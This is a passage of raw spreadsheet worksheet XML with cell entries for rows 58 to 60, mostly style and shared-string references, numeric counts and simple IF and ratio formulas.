      <c r="KR58" s="127"/>
      <c r="KS58" s="127"/>
      <c r="KT58" s="127"/>
      <c r="KU58" s="127"/>
      <c r="KV58" s="127"/>
      <c r="KW58" s="127"/>
      <c r="KX58" s="127"/>
      <c r="KY58" s="127"/>
      <c r="KZ58" s="127"/>
      <c r="LA58" s="127"/>
      <c r="LB58" s="127"/>
      <c r="LC58" s="127"/>
      <c r="LD58" s="127"/>
      <c r="LE58" s="127"/>
      <c r="LF58" s="127"/>
      <c r="LG58" s="127"/>
      <c r="LH58" s="127"/>
      <c r="LI58" s="127"/>
      <c r="LJ58" s="127"/>
      <c r="LK58" s="127"/>
      <c r="LL58" s="127"/>
      <c r="LM58" s="127"/>
      <c r="LN58" s="127"/>
      <c r="LO58" s="127"/>
      <c r="LP58" s="127"/>
      <c r="LQ58" s="127"/>
      <c r="LR58" s="127"/>
      <c r="LS58" s="127"/>
      <c r="LT58" s="127"/>
      <c r="LU58" s="127"/>
      <c r="LV58" s="127"/>
      <c r="LW58" s="127"/>
      <c r="LX58" s="127"/>
      <c r="LY58" s="127"/>
      <c r="LZ58" s="127"/>
      <c r="MA58" s="127"/>
      <c r="MB58" s="127"/>
      <c r="MC58" s="127"/>
      <c r="MD58" s="127"/>
      <c r="ME58" s="127"/>
      <c r="MF58" s="127"/>
      <c r="MG58" s="127"/>
      <c r="MH58" s="127"/>
      <c r="MI58" s="127"/>
      <c r="MJ58" s="127"/>
      <c r="MK58" s="127"/>
      <c r="ML58" s="127"/>
      <c r="MM58" s="127"/>
      <c r="MN58" s="127"/>
      <c r="MO58" s="127"/>
      <c r="MP58" s="127"/>
      <c r="MQ58" s="127"/>
      <c r="MR58" s="127"/>
      <c r="MS58" s="127"/>
      <c r="MT58" s="127"/>
      <c r="MU58" s="127"/>
      <c r="MV58" s="127"/>
      <c r="MW58" s="127"/>
      <c r="MX58" s="127"/>
      <c r="MY58" s="127"/>
      <c r="MZ58" s="127"/>
      <c r="NA58" s="127"/>
      <c r="NB58" s="127"/>
      <c r="NC58" s="127"/>
      <c r="ND58" s="127"/>
      <c r="NE58" s="127"/>
      <c r="NF58" s="127"/>
      <c r="NG58" s="127"/>
      <c r="NH58" s="127"/>
      <c r="NI58" s="127"/>
      <c r="NJ58" s="127"/>
      <c r="NK58" s="127"/>
      <c r="NL58" s="127"/>
      <c r="NM58" s="127"/>
      <c r="NN58" s="127"/>
      <c r="NO58" s="127"/>
      <c r="NP58" s="127"/>
      <c r="NQ58" s="127"/>
      <c r="NR58" s="127"/>
      <c r="NS58" s="127"/>
      <c r="NT58" s="127"/>
      <c r="NU58" s="127"/>
      <c r="NV58" s="127"/>
      <c r="NW58" s="127"/>
      <c r="NX58" s="127"/>
      <c r="NY58" s="127"/>
    </row>
    <row r="59" ht="153.75" customHeight="1">
      <c r="B59" s="89" t="s">
        <v>558</v>
      </c>
      <c r="C59" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D59" s="90" t="s">
        <v>559</v>
      </c>
      <c r="E59" s="90" t="s">
        <v>1175</v>
      </c>
      <c r="F59" s="90" t="s">
        <v>1176</v>
      </c>
      <c r="G59" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H59" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I59" s="92" t="s">
        <v>1177</v>
      </c>
      <c r="J59" s="92" t="s">
        <v>1178</v>
      </c>
      <c r="K59" s="92" t="s">
        <v>1179</v>
      </c>
      <c r="L59" s="93" t="s">
        <v>12</v>
      </c>
      <c r="M59" s="93">
        <v>116.0</v>
      </c>
      <c r="N59" s="93">
        <v>112.0</v>
      </c>
      <c r="O59" s="93">
        <v>0.0</v>
      </c>
      <c r="P59" s="93">
        <v>11053.0</v>
      </c>
      <c r="Q59" s="93">
        <v>11053.0</v>
      </c>
      <c r="R59" s="93">
        <v>11053.0</v>
      </c>
      <c r="S59" s="93">
        <v>0.0</v>
      </c>
      <c r="T59" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U59" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V59" s="96" t="s">
        <v>12</v>
      </c>
      <c r="W59" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X59" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y59" s="96" t="s">
        <v>512</v>
      </c>
      <c r="Z59" s="96" t="s">
        <v>1180</v>
      </c>
      <c r="AA59" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB59" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC59" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD59" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE59" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF59" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG59" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH59" s="99" t="s">
        <v>1181</v>
      </c>
      <c r="AI59" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ59" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK59" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL59" s="100">
        <v>0.0</v>
      </c>
      <c r="AM59" s="100">
        <v>0.0</v>
      </c>
      <c r="AN59" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO59" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP59" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ59" s="100">
        <v>0.0</v>
      </c>
      <c r="AR59" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS59" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT59" s="100" t="str">
        <f t="shared" ref="AT59:AT64" si="101">IF(AR59="-",AS59,AR59)</f>
        <v>-</v>
      </c>
      <c r="AU59" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV59" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW59" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX59" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY59" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ59" s="100">
        <v>0.0</v>
      </c>
      <c r="BA59" s="102">
        <v>116.0</v>
      </c>
      <c r="BB59" s="102">
        <v>0.0</v>
      </c>
      <c r="BC59" s="102">
        <v>0.0</v>
      </c>
      <c r="BD59" s="102">
        <v>0.0</v>
      </c>
      <c r="BE59" s="102">
        <v>0.0</v>
      </c>
      <c r="BF59" s="102">
        <v>0.0</v>
      </c>
      <c r="BG59" s="102">
        <v>0.0</v>
      </c>
      <c r="BH59" s="102">
        <v>0.0</v>
      </c>
      <c r="BI59" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ59" s="102">
        <v>0.0</v>
      </c>
      <c r="BK59" s="102">
        <v>0.0</v>
      </c>
      <c r="BL59" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM59" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN59" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO59" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP59" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ59" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR59" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS59" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT59" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU59" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV59" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW59" s="143">
        <v>2009714.0</v>
      </c>
      <c r="BX59" s="143">
        <v>1.0</v>
      </c>
      <c r="BY59" s="143">
        <v>5505.0</v>
      </c>
      <c r="BZ59" s="144" t="s">
        <v>12</v>
      </c>
      <c r="CA59" s="104">
        <v>2009714.0</v>
      </c>
      <c r="CB59" s="104">
        <v>1.0</v>
      </c>
      <c r="CC59" s="104">
        <v>5505.0</v>
      </c>
      <c r="CD59" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE59" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF59" s="104" t="str">
        <f t="shared" ref="CF59:CF65" si="102">IF(CD59="-",CE59,CD59)</f>
        <v>-</v>
      </c>
      <c r="CG59" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH59" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI59" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ59" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK59" s="104">
        <v>0.0</v>
      </c>
      <c r="CL59" s="104">
        <v>0.0</v>
      </c>
      <c r="CM59" s="105">
        <v>116.0</v>
      </c>
      <c r="CN59" s="105">
        <v>112.0</v>
      </c>
      <c r="CO59" s="105">
        <v>5505.0</v>
      </c>
      <c r="CP59" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ59" s="105">
        <v>5505.0</v>
      </c>
      <c r="CR59" s="105">
        <v>5505.0</v>
      </c>
      <c r="CS59" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CT59" s="105">
        <v>0.0</v>
      </c>
      <c r="CU59" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CV59" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CW59" s="105">
        <v>112.0</v>
      </c>
      <c r="CX59" s="105">
        <v>5505.0</v>
      </c>
      <c r="CY59" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ59" s="105">
        <v>5505.0</v>
      </c>
      <c r="DA59" s="105">
        <v>5505.0</v>
      </c>
      <c r="DB59" s="106">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="DC59" s="106">
        <f t="shared" si="16"/>
        <v>1</v>
      </c>
      <c r="DD59" s="106" t="str">
        <f t="shared" si="17"/>
        <v>-</v>
      </c>
      <c r="DE59" s="106">
        <f t="shared" si="18"/>
        <v>0.4980548267</v>
      </c>
      <c r="DF59" s="106">
        <f t="shared" si="19"/>
        <v>0.4980548267</v>
      </c>
      <c r="DG59" s="106" t="str">
        <f t="shared" si="20"/>
        <v>-</v>
      </c>
      <c r="DH59" s="106">
        <f t="shared" si="21"/>
        <v>0.4980548267</v>
      </c>
      <c r="DI59" s="106">
        <f t="shared" si="22"/>
        <v>0.4980548267</v>
      </c>
      <c r="DJ59" s="106" t="str">
        <f t="shared" si="23"/>
        <v>-</v>
      </c>
      <c r="DK59" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DL59" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DM59" s="108" t="s">
        <v>1182</v>
      </c>
      <c r="DN59" s="108">
        <v>6.0</v>
      </c>
      <c r="DO59" s="108">
        <v>17114.0</v>
      </c>
      <c r="DP59" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ59" s="108" t="s">
        <v>1182</v>
      </c>
      <c r="DR59" s="108">
        <v>6.0</v>
      </c>
      <c r="DS59" s="108">
        <v>17114.0</v>
      </c>
      <c r="DT59" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU59" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV59" s="108" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DW59" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX59" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY59" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ59" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA59" s="108">
        <v>0.0</v>
      </c>
      <c r="EB59" s="108">
        <v>0.0</v>
      </c>
      <c r="EC59" s="109">
        <v>116.0</v>
      </c>
      <c r="ED59" s="109">
        <v>112.0</v>
      </c>
      <c r="EE59" s="109">
        <v>5507.0</v>
      </c>
      <c r="EF59" s="109">
        <v>11609.0</v>
      </c>
      <c r="EG59" s="109">
        <v>5505.0</v>
      </c>
      <c r="EH59" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EI59" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EJ59" s="109">
        <v>0.0</v>
      </c>
      <c r="EK59" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EL59" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EM59" s="109">
        <v>112.0</v>
      </c>
      <c r="EN59" s="109">
        <v>5507.0</v>
      </c>
      <c r="EO59" s="109">
        <v>11609.0</v>
      </c>
      <c r="EP59" s="109">
        <v>5505.0</v>
      </c>
      <c r="EQ59" s="109" t="s">
        <v>12</v>
      </c>
      <c r="ER59" s="110">
        <f t="shared" si="27"/>
        <v>1</v>
      </c>
      <c r="ES59" s="110">
        <f t="shared" si="28"/>
        <v>1</v>
      </c>
      <c r="ET59" s="110" t="str">
        <f t="shared" si="29"/>
        <v>-</v>
      </c>
      <c r="EU59" s="110">
        <f t="shared" si="30"/>
        <v>0.4982357731</v>
      </c>
      <c r="EV59" s="110">
        <f t="shared" si="31"/>
        <v>0.4982357731</v>
      </c>
      <c r="EW59" s="110" t="str">
        <f t="shared" si="32"/>
        <v>-</v>
      </c>
      <c r="EX59" s="110" t="str">
        <f t="shared" si="33"/>
        <v>-</v>
      </c>
      <c r="EY59" s="110" t="str">
        <f t="shared" si="34"/>
        <v>-</v>
      </c>
      <c r="EZ59" s="110" t="str">
        <f t="shared" si="35"/>
        <v>-</v>
      </c>
      <c r="FA59" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FB59" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FC59" s="111" t="s">
        <v>1183</v>
      </c>
      <c r="FD59" s="111">
        <v>10.0</v>
      </c>
      <c r="FE59" s="111">
        <v>17179.0</v>
      </c>
      <c r="FF59" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG59" s="111" t="s">
        <v>1184</v>
      </c>
      <c r="FH59" s="111">
        <v>8.0</v>
      </c>
      <c r="FI59" s="111">
        <v>17121.0</v>
      </c>
      <c r="FJ59" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FK59" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL59" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM59" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN59" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FO59" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP59" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ59" s="111">
        <v>0.0</v>
      </c>
      <c r="FR59" s="111">
        <v>0.0</v>
      </c>
      <c r="FS59" s="112">
        <v>116.0</v>
      </c>
      <c r="FT59" s="112">
        <v>112.0</v>
      </c>
      <c r="FU59" s="112">
        <v>5549.0</v>
      </c>
      <c r="FV59" s="112">
        <v>11609.0</v>
      </c>
      <c r="FW59" s="112">
        <v>5570.0</v>
      </c>
      <c r="FX59" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FY59" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FZ59" s="112">
        <v>0.0</v>
      </c>
      <c r="GA59" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GB59" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GC59" s="112">
        <v>112.0</v>
      </c>
      <c r="GD59" s="112">
        <v>5511.0</v>
      </c>
      <c r="GE59" s="112">
        <v>11609.0</v>
      </c>
      <c r="GF59" s="112">
        <v>5513.0</v>
      </c>
      <c r="GG59" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GH59" s="113">
        <f t="shared" si="39"/>
        <v>1</v>
      </c>
      <c r="GI59" s="113">
        <f t="shared" si="40"/>
        <v>1</v>
      </c>
      <c r="GJ59" s="113" t="str">
        <f t="shared" si="41"/>
        <v>-</v>
      </c>
      <c r="GK59" s="113">
        <f t="shared" si="42"/>
        <v>0.5020356464</v>
      </c>
      <c r="GL59" s="113">
        <f t="shared" si="43"/>
        <v>0.4985976658</v>
      </c>
      <c r="GM59" s="113" t="str">
        <f t="shared" si="44"/>
        <v>-</v>
      </c>
      <c r="GN59" s="113" t="str">
        <f t="shared" si="45"/>
        <v>-</v>
      </c>
      <c r="GO59" s="113" t="str">
        <f t="shared" si="46"/>
        <v>-</v>
      </c>
      <c r="GP59" s="113" t="str">
        <f t="shared" si="47"/>
        <v>-</v>
      </c>
      <c r="GQ59" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GR59" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GS59" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT59" s="94"/>
      <c r="GU59" s="116">
        <v>17702.0</v>
      </c>
      <c r="GV59" s="116">
        <v>1.0</v>
      </c>
      <c r="GW59" s="116">
        <v>224.0</v>
      </c>
      <c r="GX59" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY59" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ59" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA59" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB59" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC59" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD59" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE59" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF59" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG59" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH59" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI59" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ59" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK59" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL59" s="93">
        <v>116.0</v>
      </c>
      <c r="HM59" s="93">
        <f t="shared" si="83"/>
        <v>112</v>
      </c>
      <c r="HN59" s="93">
        <v>112.0</v>
      </c>
      <c r="HO59" s="93">
        <v>0.0</v>
      </c>
      <c r="HP59" s="93">
        <v>112.0</v>
      </c>
      <c r="HQ59" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR59" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS59" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT59" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU59" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV59" s="119" t="s">
        <v>1185</v>
      </c>
      <c r="HW59" s="119">
        <v>4.0</v>
      </c>
      <c r="HX59" s="119">
        <v>10895.0</v>
      </c>
      <c r="HY59" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ59" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA59" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB59" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC59" s="120" t="s">
        <v>1186</v>
      </c>
      <c r="ID59" s="120" t="s">
        <v>1185</v>
      </c>
      <c r="IE59" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF59" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG59" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH59" s="120"/>
      <c r="II59" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ59" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK59" s="99">
        <v>115.0</v>
      </c>
      <c r="IL59" s="99">
        <v>112.0</v>
      </c>
      <c r="IM59" s="121">
        <f t="shared" si="97"/>
        <v>112</v>
      </c>
      <c r="IN59" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO59" s="98">
        <v>112.0</v>
      </c>
      <c r="IP59" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ59" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR59" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS59" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT59" s="127"/>
      <c r="IU59" s="127"/>
      <c r="IV59" s="127"/>
      <c r="IW59" s="127"/>
      <c r="IX59" s="127"/>
      <c r="IY59" s="127"/>
      <c r="IZ59" s="127"/>
      <c r="JA59" s="127"/>
      <c r="JB59" s="127"/>
      <c r="JC59" s="127"/>
      <c r="JD59" s="127"/>
      <c r="JE59" s="127"/>
      <c r="JF59" s="127"/>
      <c r="JG59" s="127"/>
      <c r="JH59" s="127"/>
      <c r="JI59" s="127"/>
      <c r="JJ59" s="127"/>
      <c r="JK59" s="127"/>
      <c r="JL59" s="127"/>
      <c r="JM59" s="127"/>
      <c r="JN59" s="127"/>
      <c r="JO59" s="127"/>
      <c r="JP59" s="127"/>
      <c r="JQ59" s="127"/>
      <c r="JR59" s="127"/>
      <c r="JS59" s="127"/>
      <c r="JT59" s="127"/>
      <c r="JU59" s="127"/>
      <c r="JV59" s="127"/>
      <c r="JW59" s="127"/>
      <c r="JX59" s="127"/>
      <c r="JY59" s="127"/>
      <c r="JZ59" s="127"/>
      <c r="KA59" s="127"/>
      <c r="KB59" s="127"/>
      <c r="KC59" s="127"/>
      <c r="KD59" s="127"/>
      <c r="KE59" s="127"/>
      <c r="KF59" s="127"/>
      <c r="KG59" s="127"/>
      <c r="KH59" s="127"/>
      <c r="KI59" s="127"/>
      <c r="KJ59" s="127"/>
      <c r="KK59" s="127"/>
      <c r="KL59" s="127"/>
      <c r="KM59" s="127"/>
      <c r="KN59" s="127"/>
      <c r="KO59" s="127"/>
      <c r="KP59" s="127"/>
      <c r="KQ59" s="127"/>
      <c r="KR59" s="127"/>
      <c r="KS59" s="127"/>
      <c r="KT59" s="127"/>
      <c r="KU59" s="127"/>
      <c r="KV59" s="127"/>
      <c r="KW59" s="127"/>
      <c r="KX59" s="127"/>
      <c r="KY59" s="127"/>
      <c r="KZ59" s="127"/>
      <c r="LA59" s="127"/>
      <c r="LB59" s="127"/>
      <c r="LC59" s="127"/>
      <c r="LD59" s="127"/>
      <c r="LE59" s="127"/>
      <c r="LF59" s="127"/>
      <c r="LG59" s="127"/>
      <c r="LH59" s="127"/>
      <c r="LI59" s="127"/>
      <c r="LJ59" s="127"/>
      <c r="LK59" s="127"/>
      <c r="LL59" s="127"/>
      <c r="LM59" s="127"/>
      <c r="LN59" s="127"/>
      <c r="LO59" s="127"/>
      <c r="LP59" s="127"/>
      <c r="LQ59" s="127"/>
      <c r="LR59" s="127"/>
      <c r="LS59" s="127"/>
      <c r="LT59" s="127"/>
      <c r="LU59" s="127"/>
      <c r="LV59" s="127"/>
      <c r="LW59" s="127"/>
      <c r="LX59" s="127"/>
      <c r="LY59" s="127"/>
      <c r="LZ59" s="127"/>
      <c r="MA59" s="127"/>
      <c r="MB59" s="127"/>
      <c r="MC59" s="127"/>
      <c r="MD59" s="127"/>
      <c r="ME59" s="127"/>
      <c r="MF59" s="127"/>
      <c r="MG59" s="127"/>
      <c r="MH59" s="127"/>
      <c r="MI59" s="127"/>
      <c r="MJ59" s="127"/>
      <c r="MK59" s="127"/>
      <c r="ML59" s="127"/>
      <c r="MM59" s="127"/>
      <c r="MN59" s="127"/>
      <c r="MO59" s="127"/>
      <c r="MP59" s="127"/>
      <c r="MQ59" s="127"/>
      <c r="MR59" s="127"/>
      <c r="MS59" s="127"/>
      <c r="MT59" s="127"/>
      <c r="MU59" s="127"/>
      <c r="MV59" s="127"/>
      <c r="MW59" s="127"/>
      <c r="MX59" s="127"/>
      <c r="MY59" s="127"/>
      <c r="MZ59" s="127"/>
      <c r="NA59" s="127"/>
      <c r="NB59" s="127"/>
      <c r="NC59" s="127"/>
      <c r="ND59" s="127"/>
      <c r="NE59" s="127"/>
      <c r="NF59" s="127"/>
      <c r="NG59" s="127"/>
      <c r="NH59" s="127"/>
      <c r="NI59" s="127"/>
      <c r="NJ59" s="127"/>
      <c r="NK59" s="127"/>
      <c r="NL59" s="127"/>
      <c r="NM59" s="127"/>
      <c r="NN59" s="127"/>
      <c r="NO59" s="127"/>
      <c r="NP59" s="127"/>
      <c r="NQ59" s="127"/>
      <c r="NR59" s="127"/>
      <c r="NS59" s="127"/>
      <c r="NT59" s="127"/>
      <c r="NU59" s="127"/>
      <c r="NV59" s="127"/>
      <c r="NW59" s="127"/>
      <c r="NX59" s="127"/>
      <c r="NY59" s="127"/>
    </row>
    <row r="60" ht="153.75" customHeight="1">
      <c r="B60" s="89" t="s">
        <v>558</v>
      </c>
      <c r="C60" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D60" s="90" t="s">
        <v>559</v>
      </c>
      <c r="E60" s="90" t="s">
        <v>1187</v>
      </c>
      <c r="F60" s="90" t="s">
        <v>1188</v>
      </c>
      <c r="G60" s="90" t="s">
        <v>1189</v>
      </c>
      <c r="H60" s="90" t="s">
        <v>1190</v>
      </c>
      <c r="I60" s="92" t="s">
        <v>1191</v>
      </c>
      <c r="J60" s="92" t="s">
        <v>1192</v>
      </c>
      <c r="K60" s="92" t="s">
        <v>1193</v>
      </c>
      <c r="L60" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M60" s="93">
        <v>1.0</v>
      </c>
      <c r="N60" s="93">
        <v>1.0</v>
      </c>
      <c r="O60" s="93">
        <v>0.0</v>
      </c>
      <c r="P60" s="93">
        <v>1.0</v>
      </c>
      <c r="Q60" s="93">
        <f t="shared" ref="Q60:Q77" si="103">R60+S60</f>
        <v>1</v>
      </c>
      <c r="R60" s="93">
        <v>1.0</v>
      </c>
      <c r="S60" s="93">
        <v>0.0</v>
      </c>
      <c r="T60" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U60" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V60" s="96" t="s">
        <v>1194</v>
      </c>
      <c r="W60" s="96" t="s">
        <v>1195</v>
      </c>
      <c r="X60" s="97" t="s">
        <v>1196</v>
      </c>
      <c r="Y60" s="96" t="s">
        <v>1197</v>
      </c>
      <c r="Z60" s="96" t="s">
        <v>1198</v>
      </c>
      <c r="AA60" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB60" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC60" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD60" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE60" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF60" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG60" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH60" s="99" t="s">
        <v>1199</v>
      </c>
      <c r="AI60" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ60" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK60" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL60" s="100">
        <v>0.0</v>
      </c>
      <c r="AM60" s="100">
        <v>0.0</v>
      </c>
      <c r="AN60" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO60" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP60" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ60" s="100">
        <v>0.0</v>
      </c>
      <c r="AR60" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS60" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT60" s="100" t="str">
        <f t="shared" si="101"/>
        <v>-</v>
      </c>
      <c r="AU60" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV60" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW60" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX60" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY60" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ60" s="100">
        <v>0.0</v>
      </c>
      <c r="BA60" s="102">
        <v>1.0</v>
      </c>
      <c r="BB60" s="102">
        <v>0.0</v>
      </c>
      <c r="BC60" s="102">
        <v>0.0</v>
      </c>
      <c r="BD60" s="102">
        <v>0.0</v>
      </c>
      <c r="BE60" s="102">
        <v>0.0</v>
      </c>
      <c r="BF60" s="102">
        <v>0.0</v>
      </c>
      <c r="BG60" s="102">
        <v>0.0</v>
      </c>
      <c r="BH60" s="102">
        <v>0.0</v>
      </c>
      <c r="BI60" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ60" s="102">
        <v>0.0</v>
      </c>
      <c r="BK60" s="102">
        <v>0.0</v>
      </c>
      <c r="BL60" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM60" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN60" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO60" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP60" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ60" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR60" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS60" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT60" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU60" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV60" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW60" s="143" t="s">
        <v>12</v>
      </c>
      <c r="BX60" s="104">
        <v>0.0</v>
      </c>
      <c r="BY60" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ60" s="144" t="s">
        <v>12</v>
      </c>
      <c r="CA60" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB60" s="104">
        <v>0.0</v>
      </c>
      <c r="CC60" s="104">
        <v>0.0</v>
      </c>
      <c r="CD60" s="104" t="s">
        <v>12</v>
